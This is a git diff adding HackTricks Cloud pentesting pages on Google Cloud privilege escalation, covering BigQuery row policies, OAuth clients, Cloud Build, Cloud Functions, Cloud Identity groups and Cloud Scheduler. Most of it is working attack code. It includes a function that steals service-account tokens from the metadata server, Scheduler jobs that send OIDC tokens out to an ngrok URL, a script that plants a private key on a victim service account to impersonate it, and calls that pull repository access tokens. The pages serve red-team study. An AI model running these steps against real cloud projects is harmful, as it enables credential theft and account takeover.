+# Remove one
+bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
+
+# Remove all (if it's the last row policy you need to use this
+bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
new file mode 100644
index 0000000000..d8c3facd39
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
@@ -0,0 +1,54 @@
+# GCP - ClientAuthConfig Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Create OAuth Brand and Client
+
+[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions:
+
+* `clientauthconfig.brands.list`
+* `clientauthconfig.brands.create`
+* `clientauthconfig.brands.get`
+* `clientauthconfig.clients.create`
+* `clientauthconfig.clients.listWithSecrets`
+* `clientauthconfig.clients.getWithSecret`
+* `clientauthconfig.clients.delete`
+* `clientauthconfig.clients.update`
+
+{% code overflow="wrap" %}
+```bash
+# Create a brand
+gcloud iap oauth-brands list
+gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL
+# Create a client of the brand
+gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
new file mode 100644
index 0000000000..7cc370693b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
@@ -0,0 +1,94 @@
+# GCP - Cloudbuild Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## cloudbuild
+
+For more information about Cloud Build check:
+
+{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %}
+[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md)
+{% endcontent-ref %}
+
+### `cloudbuild.builds.create`
+
+With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
+Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
+
+You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
+
+For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
+
+### `cloudbuild.builds.update`
+
+**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
+
+TODO
+
+### `cloudbuild.repositories.accessReadToken`
+
+With this permission the user can get the **read access token** used to access the repository:
+
+{% code overflow="wrap" %}
+```bash
+curl -X POST \
+     -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+     -H "Content-Type: application/json" \
+     -d '{}' \
+     "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"
+```
+{% endcode %}
+
+### `cloudbuild.repositories.accessReadWriteToken`
+
+With this permission the user can get the **read and write access token** used to access the repository:
+
+{% code overflow="wrap" %}
+```bash
+curl -X POST \
+     -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+     -H "Content-Type: application/json" \
+     -d '{}' \
+     "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"
+```
+{% endcode %}
+
+### `cloudbuild.connections.fetchLinkableRepositories`
+
+With this permission you can **get the repos the connection has access to:**
+
+{% code overflow="wrap" %}
+```bash
+curl -X GET \
+     -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+     "https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
new file mode 100644
index 0000000000..7d4c10c243
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
@@ -0,0 +1,142 @@
+# GCP - Cloudfunctions Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## cloudfunctions
+
+More information about Cloud Functions:
+
+{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
+[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
+{% endcontent-ref %}
+
+### `cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
+
+An attacker with these privileges can **create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account**. Then, leak the Service Account token from the metadata to escalate privileges to it.\
+Some privileges to trigger the function might be required.
+
+Exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
+
+### `cloudfunctions.functions.update` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
+
+An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.
+
+{% hint style="danger" %}
+In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.
+{% endhint %}
+
+Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required.
+
+```bash
+# Create new code
+temp_dir=$(mktemp -d)
+
+cat > $temp_dir/main.py <<EOF
+import subprocess
+
+def main(request):
+    cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
+    result = subprocess.check_output(cmd, shell=True, text=True)
+    return result
+EOF
+
+echo "" > $temp_dir/requirements.txt
+
+zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt
+
+# Update code
+gcloud functions deploy <cloudfunction-name> \
+  --runtime python312 \
+  --source $temp_dir \
+  --entry-point main \
+  --service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
+  --trigger-http \
+  --allow-unauthenticated
+
+# Get SA token calling the new function code
+gcloud functions call <cloudfunction-name>
+```
+
+{% hint style="danger" %}
+If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
+{% endhint %}
+
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
+
+### `cloudfunctions.functions.sourceCodeSet`
+
+With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**
+
+{% code overflow="wrap" %}
+```bash
+# Generate the URL
+curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
+-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
+-H "Content-Type: application/json" \
+-d '{}'
+```
+{% endcode %}
+
+Not really sure how useful only this permission is from an attackers perspective, but good to know.
+
+### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs`
+
+Give yourself any of the previous **`.update`** or **`.create`** privileges to escalate.
+
+### `cloudfunctions.functions.update`
+
+Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.actAs`** you **won't be able to update the function SO THIS IS NOT A VALID PRIVESC.**
+
+### Read & Write Access over the bucket
+
+If you have read and write access over the bucket you can monitor changes in the code and whenever an **update in the bucket happens you can update the new code with your own code** that the new version of the Cloud Function will be run with the submitted backdoored code.
+
+You can check more about the attack in:
+
+{% content-ref url="gcp-storage-privesc.md" %}
+[gcp-storage-privesc.md](gcp-storage-privesc.md)
+{% endcontent-ref %}
+
+However, you cannot use this to pre-compromise third party Cloud Functions because if you create the bucket in your account and give it public permissions so the external project can write over it, you get the following error:
+
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" width="304"><figcaption></figcaption></figure>
+
+{% hint style="danger" %}
+However, this could be used for DoS attacks.
+{% endhint %}
+
+### Read & Write Access over Artifact Registry
+
+When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**.
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
new file mode 100644
index 0000000000..3d7d16fef0
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
@@ -0,0 +1,64 @@
+# GCP - Cloudidentity Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloudidentity
+
+For more information about the cloudidentity service, check this page:
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+### Add yourself to a group
+
+If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
+
+{% code overflow="wrap" %}
+```bash
+gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
+# If --roles isn't specified you will get MEMBER
+```
+{% endcode %}
+
+### Modify group membership
+
+If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
+
+{% code overflow="wrap" %}
+```bash
+# Check the current membership level
+gcloud identity groups memberships describe --member-email <email> --group-email <email>
+
+# If not OWNER try
+gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
new file mode 100644
index 0000000000..72ae9590c6
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
@@ -0,0 +1,151 @@
+# GCP - Cloud Scheduler Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Scheduler
+
+More information in:
+
+{% content-ref url="../gcp-services/gcp-cloud-scheduler-enum.md" %}
+[gcp-cloud-scheduler-enum.md](../gcp-services/gcp-cloud-scheduler-enum.md)
+{% endcontent-ref %}
+
+### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
+
+An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.
+
+* **Contact  any google API via`googleapis.com` with OAuth token header**
+
+Create a new Storage bucket:
+
+{% code overflow="wrap" %}
+```bash
+gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
+```
+{% endcode %}
+
+To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**
+
+* **Exfiltrate OIDC service account token**
+
+{% code overflow="wrap" %}
+```bash
+gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
+
+# Listen in the ngrok address to get the OIDC token in clear text.
+```
+{% endcode %}
+
+If you need to check the HTTP response you might just t**ake a look at the logs of the execution**.
+
+### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
+
+Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:
+
+{% code overflow="wrap" %}
+```bash
+gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
+
+# Listen in the ngrok address to get the OIDC token in clear text.
+```
+{% endcode %}
+
+Another example to upload a private key to a SA and impersonate it:
+
+{% code overflow="wrap" %}
+```bash
+# Generate local private key
+openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
+    -keyout /tmp/private_key.pem \
+    -out /tmp/public_key.pem \
+    -subj "/CN=unused"
+
+# Remove last new line character of the public key
+file_size=$(wc -c < /tmp/public_key.pem)
+new_size=$((file_size - 1))
+truncate -s $new_size /tmp/public_key.pem
+
+# Update scheduler to upload the key to a SA
+## For macOS: REMOVE THE `-w 0` FROM THE BASE64 COMMAND
+gcloud scheduler jobs update http scheduler_lab_1 \
+  --schedule='* * * * *' \
+  --uri="https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json" \
+  --message-body="{\"publicKeyData\": \"$(cat /tmp/public_key.pem | base64 -w 0)\"}" \
+  --update-headers "Content-Type=application/json" \
+  --location us-central1 \
+  --oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com
+
+# Wait 1 min
+sleep 60
+
+# Check the logs to check it worked
+gcloud logging read 'resource.type="cloud_scheduler_job" AND resource.labels.job_id="scheduler_lab_1" AND resource.labels.location="us-central1"
+jsonPayload.@type="type.googleapis.com/google.cloud.scheduler.logging.AttemptFinished"' --limit 10 --project <project-id> --format=json
+
+## If any  '"status": 200'  it means it worked!
+## Note that this scheduler will be executed every minute and after a key has been created, all the other attempts to submit the same key will throw a: "status": 400
+
+# Build the json to contact the SA
+## Get privatekey in json format
+file_content=$(<"/tmp/private_key.pem")
+private_key_json=$(jq -Rn --arg str "$file_content" '$str')
+
+## Get ID of the generated key
+gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com
+
+# Create the json in a file
+## NOTE that you need to export your project-id in the env var PROJECT_ID
+## and that this script is expecting the key ID to be the first one (check the `head`)
+export PROJECT_ID=...
+cat > /tmp/lab.json <<EOF
+{
+  "type": "service_account",
+  "project_id": "$PROJECT_ID",
+  "private_key_id": "$(gcloud iam service-accounts keys list --iam-account=scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | cut -d " " -f 1 | grep -v KEY_ID | head -n 1)",
+  "private_key": $private_key_json,
+  "client_email": "scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com",
+  "client_id": "$(gcloud iam service-accounts describe scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
+  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
+  "token_uri": "https://oauth2.googleapis.com/token",
+  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
+  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/scheduler-lab-1-target%40$PROJECT_ID.iam.gserviceaccount.com",
+  "universe_domain": "googleapis.com"
+}
+EOF
+
+# Activate the generated key
+gcloud auth activate-service-account --key-file=/tmp/lab.json
+```
+{% endcode %}
+
+## References
+
+* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
new file mode 100644
